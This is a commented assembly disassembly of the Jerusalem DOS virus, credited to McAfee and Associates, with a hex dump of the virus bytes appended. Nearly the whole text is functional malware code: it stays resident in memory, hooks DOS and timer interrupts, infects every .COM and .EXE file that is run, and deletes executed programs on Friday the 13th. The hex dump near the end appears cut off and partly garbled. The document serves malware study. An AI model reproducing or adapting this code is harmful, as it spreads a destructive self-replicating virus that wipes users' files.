The following is a disassembled, structured and commented listing of the Jerusalem .COM and .EXE infector virus. All comments, structure inclusions and explanations are copyright John McAfee and Associates 1988, all rights reserved. DO NOT distribute without contacting John at 408 988 3832, or write : John McAfee 4423 Cheeney Street Santa Clara, CA 95054 (NOTE: This is an extraordinarily poor disassembly. We purposely spent little time on it since it is a common virus that has been thoroughly studied by dozens of others. - In other words - we were lazy). PAGE 64,132 ;-----------------------------------------------------------------------; ; THE "JERUSALEM" VIRUS ; ;-----------------------------------------------------------------------; ; ORG 100H ; ; ;-----------------------------------------------------------------------; ; JERUSALEM VIRUS ; ;-----------------------------------------------------------------------; BEGIN_COM: ;COM FILES START HERE JMP CONTINUE ; ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; A0103 DB 073H,055H MS_DOS DB 'MsDos' ; DB 000H,001H,015H,018H TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! DB 000H A0010 DB 000H A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR OLD_24 DW 0556H,16A5H ;001B A_FLAG DW 7E48H ;??? A0021 DB 000H,000H,000H,000H,000H,000H,000H DB 000H,000H,000H,000H A002C DW 0 ;A SEGMENT DB 000H,000H A0030 DB 000H A0031 DW 0178EH ;OLD ES VALUE A0033 DW 0080H ; ; EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 DW 80H ;COMMAND LINE ADDRESS DW 178EH ;+4 DW 005CH ;FCB #1 ADDRESS DW 178EH ;+8 DW 006CH ;FCB #2 ADDRESS DW 0178EH ;+12 ; HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 HOST_SS DW 347AH ;(AT TIME OF INFECTION) HOST_IP DW 00C5H ; HOST_CS DW 347AH ; ;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF ; A004B DW 0F010H ; A004D DB 82H ; A004E DB 0 ; EXE_HDR DB 1CH DUP (?) ;004F A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST HANDLE DW 0005H ;0070 HOST_ATT DW 0020H ;0072 HOST_DATE DW 0021H ;0074 HOST_TIME DW 002DH ;0076 BLOCK_SIZE DW 512 ;512 BYTES/BLOCK A007A DW 0010H HOST_SIZE DW 27C0H,0001H ;007C HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME COMMAND_COM DB 'COMMAND.COM' DB 1 A0090 DB 0,0,0,0,0 ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; CONTINUE: ; CLD ; MOV AH,0E0H ;DO A ???... INT 21H ; ; CMP AH,0E0H ; JNC L01B5 ; CMP AH,3 ; JC L01B5 ; ; MOV AH,0DDH ; MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE ADD SI,DI ;SI = BEGINNING OF HOST CODE MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) INT 21H ; ; L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H ADD AX,10H ; MOV SS,AX ;SS = TWEEKed CS MOV SP,700H ;SP = END OF OUR CODE (VIRUS) ; ;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF ; PUSH AX ;JMP FAR CS+10H:IP-100H MOV AX,offset BEGIN_EXE - offset BEGIN_COM PUSH AX ; RETF ; ; ;---------------------------------------; ORG 0C5h ; ;---------------------------------------; ; BEGIN_EXE: ;EXE FILES START HERE CLD ; PUSH ES ; ; MOV CS:[A0031],ES ; MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES MOV CS:[EXEC_BLOCK+8],ES ; MOV CS:[EXEC_BLOCK+12],ES ; ; MOV AX,ES ;TWEEK ES SAME AS CS ABOVE ADD AX,10H ; ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE ADD CS:[HOST_SS],AX ; ; MOV AH,0E0H ; INT 21H ; ; CMP AH,0E0H ; JNC L0106 ;00F1 7313 ; CMP AH,3 ; POP ES ;00F6 MOV SS,CS:[HOST_SS] ; MOV SP,CS:[HOST_SP] ; JMP far CS:[HSOT_IP] ; ; L0106: XOR AX,AX ;0106 33C0 MOV ES,AX ;0108 8EC0 MOV AX,ES:[03FC] ;010A 26A1FC03 MOV CS:[A004B],AX ;010E 2EA34B00 MOV AL,ES:[03FE] ;0112 26A0FE03 MOV CS:[A004D],AL ;0116 2EA24D00 MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB POP AX ;0127 58 ADD AX,10H ;0128 051000 MOV ES,AX ;012B 8EC0 PUSH CS ;012D 0E POP DS ;012E 1F MOV CX,710H ;SIZE OF VIRUS CODE SHR CX,1 ;0132 D1E9 XOR SI,SI ;0134 33F6 MOV DI,SI ;0136 8BFE PUSH ES ;0138 06 MOV AX,0142 ;0139 B84201 PUSH AX ;013C 50 JMP 0000:03FC ;013D EAFC030000 ; MOV AX,CS ;0142 8CC8 MOV SS,AX ;0144 8ED0 MOV SP,700H ;0146 BC0007 XOR AX,AX ;0149 33C0 MOV DS,AX ;014B 8ED8 MOV AX,CS:[A004B] ;014D 2EA14B00 MOV [03FC],AX ;0151 A3FC03 MOV AL,CS:[A004D] ;0154 2EA04D00 MOV [03FE],AL ;0158 A2FE03 MOV BX,SP ;015B 8BDC MOV CL,04 ;015D B104 SHR BX,CL ;015F D3EB ADD BX,+10 ;0161 83C310 MOV CS:[A0033],BX ; ; MOV AH,4AH ; MOV ES,CS:[A0031] ; INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS ; MOV AX,3521 ; INT 21H ;GET VECTOR MOV CS:[OLD_21],BX ; MOV CS:[OLD_21+2],ES ; ; PUSH CS ;0181 0E POP DS ;0182 1F MOV DX,offset NEW_INT_21 ;0183 BA5B02 MOV AX,2521 ; INT 21H ;SAVE VECTOR ; MOV ES,[A0031] ;018B 8E063100 MOV ES,ES:[A002C] ;018F 268E062C00 XOR DI,DI ;0194 33FF MOV CX,7FFFH ;0196 B9FF7F XOR AL,AL ;0199 32C0 REPNE SCASB ;019C AE CMP ES:[DI],AL ;019D 263805 LOOPNZ 019B ;01A0 E0F9 MOV DX,DI ;01A2 8BD7 ADD DX,+03 ;01A4 83C203 MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM PUSH ES ; POP DS ; PUSH CS ; POP ES ; MOV BX,35H ; ; PUSH DS ;01B1 ; PUSH ES ; PUSH AX ; PUSH BX ; PUSH CX ; PUSH DX ; ; MOV AH,2AH ; INT 21H ;GET DATE ; MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" ; CMP CX,1987 ;IF 1987... JE L01F7 ;...JUMP CMP AL,5 ;IF NOT FRIDAY... JNE L01D8 ;...JUMP CMP DL,0DH ;IF DATE IS NOT THE 13th... JNE L01D8 ;...JUMP INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT JMP L01F7 ; ; L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR INT 21H ;GET VECTOR MOV CS:[OLD_08],BX ; MOV CS:[OLD_08],ES ; ; PUSH CS ;DS=CS POP DS ; ; MOV Word ptr [A_FLAG],7E90H ; ; MOV AX,2508H ;SET NEW CLOCK TIC HANDLER MOV DX,offset NEW_08 ; INT 21H ;SET VECTOR ; L01F7: POP DX ; POP CX ; POP BX ; POP AX ; POP ES ; POP DS ; PUSHF ; CALL far CS:[OLD_21] ; PUSH DS ; POP ES ; ; MOV AH,49H ; INT 21H ;FREE ALLOCATED MEMORY ; MOV AH,4DH ; INT 21H ;GET RETURN CODE OF A SUBPROCESS ; ;---------------------------------------; ; THIS IS WHERE WE REMAIN RESIDENT ; ;---------------------------------------; MOV AH,31H ; MOV DX,0600H ;020F ; MOV CL,04 ; SHR DX,CL ; ADD DX,10H ; INT 21H ;TERMINATE AND REMAIN RESIDENT ; ;---------------------------------------; NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER IRET ; ; ;-----------------------------------------------------------------------; ; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; ;-----------------------------------------------------------------------; NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E JNE N08_10 ;IF ... JUMP ; PUSH AX ; PUSH BX ; PUSH CX ; PUSH DX ; PUSH BP ; MOV AX,0602H ;SCROLL UP TWO LINES MOV BH,87H ;INVERSE VIDEO ATTRIBUTE MOV CX,0505H ;UPPER LEFT CORNER MOV DX,1010H ;LOWER RIGHT CORNER INT 10H ; POP BP ; POP DX ; POP CX ; POP BX ; POP AX ; ; N08_10: DEC Word ptr CS:[A_FLAG] ; JMP N08_90 ; MOV Word ptr CS:[A_FLAG],1 ; ; PUSH AX ;????? IS THIS SOME KIND OF DELAY ????? PUSH CX ;*** COMMENTS SOLICITED **** - WS PUSH SI ; MOV CX,4001H ; YES IT IS (1/2 HOUR) BUT THE FUCKER NEVER REP LODSB ;GETS EXECUTED!!!!!!!!!!! -RLP POP SI ; POP CX ; POP AX ; ; N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR ; ;-----------------------------------------------------------------------; ; NEW INTERRUPT 21 HANDLER ; ;-----------------------------------------------------------------------; NEW_21: PUSHF ;025B ; CMP AH,0E0H ;IF A E0 REQUEST... JNE N21_10 ; MOV AX,300H ;...RETURN AX = 300H POPF ; (OUR PUSHF) IRET ; ; N21_10: CMP AH,0DDH ;0266 ; JE N21_30 ;IF DDH...JUMP TO _30 CMP AH,0DEH ; JE N21_40 ;IF DEH...JUMP TO _40 CMP AX,4B00H ;IF SPAWN A PROG... JNE N21_20 ; JMP N21_50 ;...JUMP TO _50 ; N21_20: POPF ; (OUR PUSHF) JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR ; N21_30: POP AX ;REMOVE OUR (PUSHF) POP AX ;? MOV AX,100H ; MOV CS:[000A],AX ; POP AX ; MOV CS:[000C],AX ; REP MOVSB ; POPF ; (OUR PUSHF) MOV AX,CS:[000F] ; JMP far CS:[000A] ; ; N21_40: ADD SP,+06 ;0298 ; POPF ; (OUR PUSHF) MOV AX,CS ; MOV SS,AX ; MOV SP,710H ;SIZE OF VIRUS CODE PUSH ES ; PUSH ES ;02A4 06 XOR DI,DI ;02A5 33FF PUSH CS ;02A7 0E POP ES ;02A8 07 MOV CX,0010 ;02A9 B91000 MOV SI,BX ;02AC 8BF3 MOV DI,0021 ;02AE BF2100 REP MOVSB ;02B2 A4 MOV AX,DS ;02B3 8CD8 MOV ES,AX ;02B5 8EC0 MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 ADD AX,CS:[002B] ;02BC 2E03062B00 ADC DX,+00 ;02C1 83D200 DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 MOV DS,AX ;02C9 8ED8 MOV SI,DX ;02CB 8BF2 MOV DI,DX ;02CD 8BFA MOV BP,ES ;02CF 8CC5 MOV BX,CS:[002F] ;02D1 2E8B1E2F00 OR BX,BX ;02D6 0BDB JE 02ED ;02D8 7413 MOV CX,8000 ;02DA B90080 REP MOVSW ;02DE A5 ADD AX,1000 ;02DF 050010 ADD BP,1000 ;02E2 81C50010 MOV DS,AX ;02E6 8ED8 MOV ES,BP ;02E8 8EC5 DEC BX ;02EA 4B JNE 02DA ;02EB 75ED MOV CX,CS:[002D] ;02ED 2E8B0E2D00 REP MOVSB ;02F3 A4 POP AX ;02F4 58 PUSH AX ;02F5 50 ADD AX,0010 ;02F6 051000 ADD CS:[0029],AX ;02F9 2E01062900 ADD CS:[0025],AX ;02FE 2E01062500 MOV AX,CS:[0021] ;0303 2EA12100 POP DS ;0307 1F POP ES ;0308 07 MOV SS,CS:[0029] ;0309 2E8E162900 MOV SP,CS:[0027] ;030E 2E8B262700 JMP far CS:[0023] ;0313 2EFF2E2300 ; ;---------------------------------------; ; IT IS TIME FOR THIS FILE TO DIE... ; ; THIS IS WHERE IT GETS DELETED ! ; ;---------------------------------------; N21_5A: XOR CX,CX ; MOV AX,4301H ; INT 21H ;CHANGE FILE MODE (ATT=0) ; MOV AH,41H ; INT 21H ;DELETE A FILE ; MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM POPF ; (OUR PUSHF) JMP far CS:[OLD_21] ; ; ;---------------------------------------; ; START INFECTION ; ;---------------------------------------; N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... JE N21_5A ;...JUMP ; MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN MOV Word ptr CS:[A008F],0 ; MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME MOV word ptr CS:[HOST_NAME+2],DS ; ; ;INFECTION PROCESS OCCURS HERE ; PUSH AX ;034C 50 PUSH BX ;034D 53 PUSH CX ;034E 51 PUSH DX ;034F 52 PUSH SI ;0350 56 PUSH DI ;0351 57 PUSH DS ;0352 1E PUSH ES ;0353 06 CLD ;0354 FC MOV DI,DX ;0355 8BFA XOR DL,DL ;0357 32D2 CMP Byte ptr [DI+01],3A ;0359 807D013A JNE L0364 ;035D 7505 MOV DL,[DI] ;035F 8A15 AND DL,1F ;0361 80E21F ; L0364: MOV AH,36 ; INT 21H ;GET DISK FREE SPACE CMP AX,-1 ;0368 3DFFFF JNE L0370 ;036B 7503 L036D: JMP I_90 ;036D E97702 ; L0370: MUL BX ;0370 F7E3 MUL CX ;0372 F7E1 OR DX,DX ;0374 0BD2 JNE L037D ;0376 7505 CMP AX,710H ;0378 3D1007 JC L036D ;037B 72F0 L037D: MOV DX,word ptr CS:[HOST_NAME] PUSH DS ;0382 1E POP ES ;0383 07 XOR AL,AL ;0384 32C0 MOV CX,41 ;0386 B94100 REPNE SCASB ;038A AE MOV SI,word ptr CS:[HOST_NAME] L0390: MOV AL,[SI] ;0390 8A04 OR AL,AL ;0392 0AC0 JE L03A4 ;0394 740E CMP AL,61 ;0396 3C61 JC L03A1 ;0398 7207 CMP AL,7A ;039A 3C7A JA L03A1 ;039C 7703 SUB Byte ptr [SI],20 ;039E 802C20 L03A1: INC SI ;03A1 46 JMP L0390 ;03A2 EBEC ; L03A4: MOV CX,000B ;03A4 B90B00 SUB SI,CX ;03A7 2BF1 MOV DI,offset COMMAND_COM ;03A9 BF8400 PUSH CS ;03AC 0E POP ES ;03AD 07 MOV CX,000B ;03AE B90B00 REPE CMPSB ;03B2 A6 JNE L03B8 ;03B3 7503 JMP I_90 ;03B5 E92F02 ; L03B8: MOV AX,4300H ; INT 21H ;CHANGE FILE MODE JC L03C4 ;03BD 7205 ; MOV CS:[HOST_ATT],CX ;03BF ; L03C4: JC L03EB ;03C4 7225 XOR AL,AL ;03C6 32C0 MOV CS:[A004E],AL ;03C8 2EA24E00 PUSH DS ;03CC 1E POP ES ;03CD 07 MOV DI,DX ;03CE 8BFA MOV CX,41 ;03D0 B94100 REPNZ SCASB ;03D4 AE CMP Byte ptr [DI-02],4D ;03D5 807DFE4D JE L03E6 ;03D9 740B CMP Byte ptr [DI-02],6D ;03DB 807DFE6D JE L03E6 ;03DF 7405 INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 ; L03E6: MOV AX,3D00H ; INT 21H ;OPEN FILE READ ONLY L03EB: JC L0447 ; MOV CS:[HANDLE],AX ;03ED ; ; MOV BX,AX ;MOVE TO END OF FILE -5 MOV AX,4202 ; MOV CX,-1 ;FFFFFFFB MOV DX,-5 ; INT 21H ;MOVE FILE POINTER JC L03EB ; ; ADD AX,5 ;0400 ; MOV CS:[A0011],AX ;?SAVE HOST SIZE ; MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST MOV DX,offset A006B ; MOV AX,CS ; MOV DS,AX ; MOV ES,AX ; MOV AH,3FH ; INT 21H ;READ FROM A FILE ; MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' MOV SI,offset MS_DOS ; REPE CMPSB ; JNE L0427 ; MOV AH,3E ;IF == 'MsDos'... INT 21H ;CLOSE FILE JMP I_90 ;...PASS CONTROL TO DOS ; L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR INT 21H ;GET VECTOR MOV [OLD_24],BX ; MOV [OLD_24+2],ES ; ; MOV DX,offset NEW_24 ; MOV AX,2524 ;SET CRITICAL ERROR VECTOR INT 21H ;SET VECTOR ; LDS DX,dword ptr [HOST_NAME]; XOR CX,CX ; MOV AX,4301H ; INT 21H ;CHANGE FILE MODE L0447: JC L0484 ; ; MOV BX,CS:[HANDLE] ; MOV AH,3E ; INT 21H ;CLOSE FILE ; MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE ; MOV AX,3D02 ; INT 21H ;OPEN FILE R/W JC L0484 ; ; MOV CS:[HANDLE],AX ;0460 2EA37000 MOV AX,CS ;0464 8CC8 MOV DS,AX ;0466 8ED8 MOV ES,AX ;0468 8EC0 MOV BX,[HANDLE] ;046A 8B1E7000 MOV AX,5700 ;046E B80057 INT 21H ;GET/SET FILE DATE TIME ; MOV [HOST_DATE],DX ;0473 89167400 MOV [HOST_TIME],CX ;0477 890E7600 MOV AX,4200 ;047B B80042 XOR CX,CX ;047E 33C9 MOV DX,CX ;0480 8BD1 INT 21H ;MOVE FILE POINTER L0484: JC L04C3 ;0484 723D ; CMP Byte ptr [A004E],00 ;0486 803E4E0000 JE L0490 ;048B 7403 JMP L04E6 ;048D EB57 ; NOP ;048F 90 L0490: MOV BX,1000 ;0490 BB0010 MOV AH,48 ;0493 B448 INT 21H ;ALLOCATE MEMORY JNC L04A4 ;0497 730B ; MOV AH,3E ;0499 B43E MOV BX,[HANDLE] ;049B 8B1E7000 INT 21H ;CLOSE FILE (OBVIOUSLY) JMP I_90 ;04A1 E94301 ; L04A4: INC Word ptr [A008F] ;04A4 FF068F00 MOV ES,AX ;04A8 8EC0 XOR SI,SI ;04AA 33F6 MOV DI,SI ;04AC 8BFE MOV CX,710H ;04AE B91007 REP MOVSB ;04B2 A4 MOV DX,DI ;04B3 8BD7 MOV CX,[A0011] ;?GET HOST SIZE - YES MOV BX,[70H] ;04B9 8B1E7000 PUSH ES ;04BD 06 POP DS ;04BE 1F MOV AH,3FH ;04BF B43F INT 21H ;READ FROM A FILE L04C3: JC L04E1 ;04C3 721C ; ADD DI,CX ;04C5 03F9 ; XOR CX,CX ;POINT TO BEGINNING OF FILE MOV DX,CX ; MOV AX,4200H ; INT 21H ;MOVE FILE POINTER ; MOV SI,offset MS_DOS ;04D0 BE0500 MOV CX,5 ;04D3 B90500 REP CS:MOVSB ;04D7 2EA4 MOV CX,DI ;04D9 8BCF XOR DX,DX ;04DB 33D2 MOV AH,40H ; INT 21H ;WRITE TO A FILE L04E1: JC L04F0 ; JMP L05A2 ; ; ;---------------------------------------; ; READ EXE HEADER ; ;---------------------------------------; L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER MOV DX,offset EXE_HDR ; MOV AH,3F ; INT 21H ;READ FILE JC L053C ; ; ;---------------------------------------; ; TWEEK EXE HEADER TO INFECTED HSOT ; ;---------------------------------------; MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO MOV AX,[EXE_HDR+14] ; SS MOV [HOST_SS],AX ; MOV AX,[EXE_HDR+16] ; SP MOV [HOST_SP],AX ; MOV AX,[EXE_HDR+20] ; IP MOV [HOST_IP],AX ; MOV AX,[EXE_HDR+22] ; CS MOV [HOST_CS],AX ; MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 JZ L051B ;IF FILE SIZE==0...JMP DEC AX ; L051B: MUL Word ptr [BLOCK_SIZE] ; ADD AX,[EXE_HDR+2] ; ADC DX,0 ;AX NOW = FILE SIZE ; ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND ADC DX,0 ; AND AX,0FFF0H ; MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS MOV [HOST_SIZE+2],DX ; ; ADD AX,710H ;(SIZE OF VIRUS) ADC DX,0 ; L053C: JC L0578 ;IF > FFFFFFFF...JMP DIV Word ptr [BLOCK_SIZE] ; OR DX,DX ; JE L0547 ; INC AX ; L0547: MOV [EXE_HDR+4],AX ; MOV [EXE_HDR+2],DX ; ;---------------; MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE MOV DX,[HOST_SIZE+2] ; DIV Word ptr [A007A] ; SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR MOV [EXE_HDR+22],AX ;VALUE OF CS MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP MOV [EXE_HDR+14],AX ;VALUE OF SS MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP ;---------------; XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) MOV DX,CX ; MOV AX,4200H ; INT 21H ;MOVE FILE POINTER L0578: JC L0584 ; ; ;---------------------------------------; ; WRITE INFECTED EXE HEADER ; ;---------------------------------------; MOV CX,1CH ; MOV DX,offset EXE_HDR ; MOV AH,40H ; INT 21H ;WRITE TO A FILE L0584: JC L0597 ; CMP AX,CX ; JNE L05A2 ; ; MOV DX,[HOST_SIZE] ;POINT TO END OF FILE MOV CX,[HOST_SIZE+2] ; MOV AX,4200 ; INT 21H ;MOVE FILE POINTER L0597: JC L05A2 ; ; ;---------------------------------------; ; WRITE VIRUS CODE TO END OF HOST ; ;---------------------------------------; XOR DX,DX ; MOV CX,710H ;(SIZE OF VIRUS) MOV AH,40H ; INT 21H ;WRITE TO A FILE ; L05A2: CMP Word ptr CS:[008F],0 ;IF... JZ L05AE ;...SKIP MOV AH,49H ; INT 21H ;FREE ALLOCATED MEMORY ; L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... JE I_90 ;...SKIP ; MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME MOV DX,CS:[HOST_DATE] ; MOV CX,CS:[HOST_TIME] ; MOV AX,5701H ; INT 21H ;GET/SET FILE DATE/TIME ; MOV AH,3EH ; INT 21H ;CLOSE FILE ; LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE MOV CX,CS:[HOST_ATT] ; MOV AX,4301H ; INT 21H ;CHANGE FILE MODE ; LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER MOV AX,2524H ; INT 21H ;SET VECTOR ; I_90: POP ES ; POP DS ; POP DI ; POP SI ; POP DX ; POP CX ; POP BX ; POP AX ; POPF ; (OUR PUSHF) JMP far CS:[OLD_21] ;PASS CONTROL TO DOS ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; ;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos...... ;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H ;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~............... ;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l ;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M ;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\.. ;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC ;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'.. ;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM. ;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s.. ;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w.. ;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P ;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9 ;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@... ;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.| ;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C ;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..# ;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s ;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9 ;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|. ;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K ;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S ;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1. ;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!......... ;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.& ;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8. ;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5 ;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F... ;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u. ;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!... ;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8 ;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X..... ;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41: ;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O.. ;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8..7. ;0330 B9 05 05 BA 10 10 CD 10-5D 5A 59 5B 58 2E FF 0E 9..:..M.]ZY[X... ;0340 1F 00 75 12 2E C7 06 1F-00 01 00 50 51 56 B9 01 ..u..G.....PQV9. ;0350 40 F3 AC 5E 59 58 2E FF-2E 13 00 9C 80 FC E0 75 @s,^YX.......|`u ;0360 05 B8 00 03 9D CF 80 FC-DD 74 13 80 FC DE 74 28 .8...O.|]t..|^t( ;0370 3D 00 4B 75 03 E9 B4 00-9D 2E FF 2E 17 00 58 58 =.Ku.i4.......XX ;0380 B8 00 01 2E A3 0A 00 58-2E A3 0C 00 F3 A4 9D 2E 8...#..X.#..s$.. ;0390 A1 0F 00 2E FF 2E 0A 00-83 C4 06 9D 8C C8 8E D0 !........D...H.P ;03A0 BC 10 07 06 06 33 FF 0E-07 B9 10 00 8B F3 BF 21 <....3...9...s?! ;03B0 00 F3 A4 8C D8 8E C0 2E-F7 26 7A 00 2E 03 06 2B .s$.X.@.w&z....+ ;03C0 00 83 D2 00 2E F7 36 7A-00 8E D8 8B F2 8B FA 8C ..R..w6z..X.r.z. ;03D0 C5 2E 8B 1E 2F 00 0B DB-74 13 B9 00 80 F3 A5 05 E.../..[t.9..s%. ;03E0 00 10 81 C5 00 10 8E D8-8E C5 4B 75 ED 2E 8B 0E ...E...X.EKum... ;03F0 2D 00 F3 A4 58 50 05 10-00 2E 01 06 29 00 2E 01 -.s$XP......)... ;0400 06 25 00 2E A1 21 00 1F-07 2E 8E 16 29 00 2E 8B .%..!!......)... ;0410 26 27 00 2E FF 2E 23 00-33 C9 B8 01 43 CD 21 B4 &'....#.3I8.CM!4 ;0420 41 CD 21 B8 00 4B 9D 2E-FF 2E 17 00 2E 80 3E 0E AM!8.K........>. ;0430 00 01 74 E4 2E C7 06 70-00 FF FF 2E C7 06 8F 00 ..td.G.p....G... ;0440 00 00 2E 89 16 80 00 2E-8C 1E 82 00 50 53 51 52 ............PSQR ;0450 56 57 1E 06 FC 8B FA 32-D2 80 7D 01 3A 75 05 8A VW..|.z2R.}.:u.. ;0460 15 80 E2 1F B4 36 CD 21-3D FF FF 75 03 E9 77 02 ..b.46M!=..u.iw. ;0470 F7 E3 F7 E1 0B D2 75 05-3D 10 07 72 F0 2E 8B 16 wcwa.Ru.=..rp... ;0480 80 00 1E 07 32 C0 B9 41-00 F2 AE 2E 8B 36 80 00 ....2@9A.r...6.. ;0490 8A 04 0A C0 74 0E 3C 61-72 07 3C 7A 77 03 80 2C ...@t...s&u. ;0520 B4 3E CD 21 E9 C0 01 B8-24 35 CD 21 89 1E 1B 00 4>M!i@.8$5M!.... ;0530 8C 06 1D 00 BA 1B 02 B8-24 25 CD 21 C5 16 80 00 ....:..8$%M!E... ;0540 33 C9 B8 01 43 CD 21 72-3B 2E 8B 1E 70 00 B4 3E 3I8.CM!r;...p.4> ;0550 CD 21 2E C7 06 70 00 FF-FF B8 02 3D CD 21 72 24 M!.G.p...8.=M!r$ ;0560 2E A3 70 00 8C C8 8E D8-8E C0 8B 